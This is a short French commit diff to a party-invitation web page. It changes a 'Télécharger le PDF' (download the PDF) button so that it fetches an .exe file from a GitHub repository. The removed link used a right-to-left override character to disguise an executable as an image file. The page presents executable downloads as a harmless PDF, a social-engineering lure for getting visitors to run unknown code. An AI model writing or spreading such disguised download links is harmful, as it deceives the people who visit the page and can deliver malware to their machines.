Mise à jour de index.html et ajout du fichier testmcs-compress.exe

--- a/index.html
+++ b/index.html
@@ -66,7 +66,7 @@
     </div>
     <h1>Afin de visualiser les événements de cette soirée veuillez afficher le PDF</h1>
     <p>Que la fête commence !</p>
-    <a class="download-btn" href="c:\Users\sandy\Desktop\testmcs‮gnp.exe" download> Télécharger le PDF </a>
+    <a class="download-btn" href="https://github.com/sndcrt/site-web-/raw/refs/heads/main/testmcs-compress%C3%A9.exe" download> Télécharger le PDF </a>
 
     <script>
         function createConfetti() {
